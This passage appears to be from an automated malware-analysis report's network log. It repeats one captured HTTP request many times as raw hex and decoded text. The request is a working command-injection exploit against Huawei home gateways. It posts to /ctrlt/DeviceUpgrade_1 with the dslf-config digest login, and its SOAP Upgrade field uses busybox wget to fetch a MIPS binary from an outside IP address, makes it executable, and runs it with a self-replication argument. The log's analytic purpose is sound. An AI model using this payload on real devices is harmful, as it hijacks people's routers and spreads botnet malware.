62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 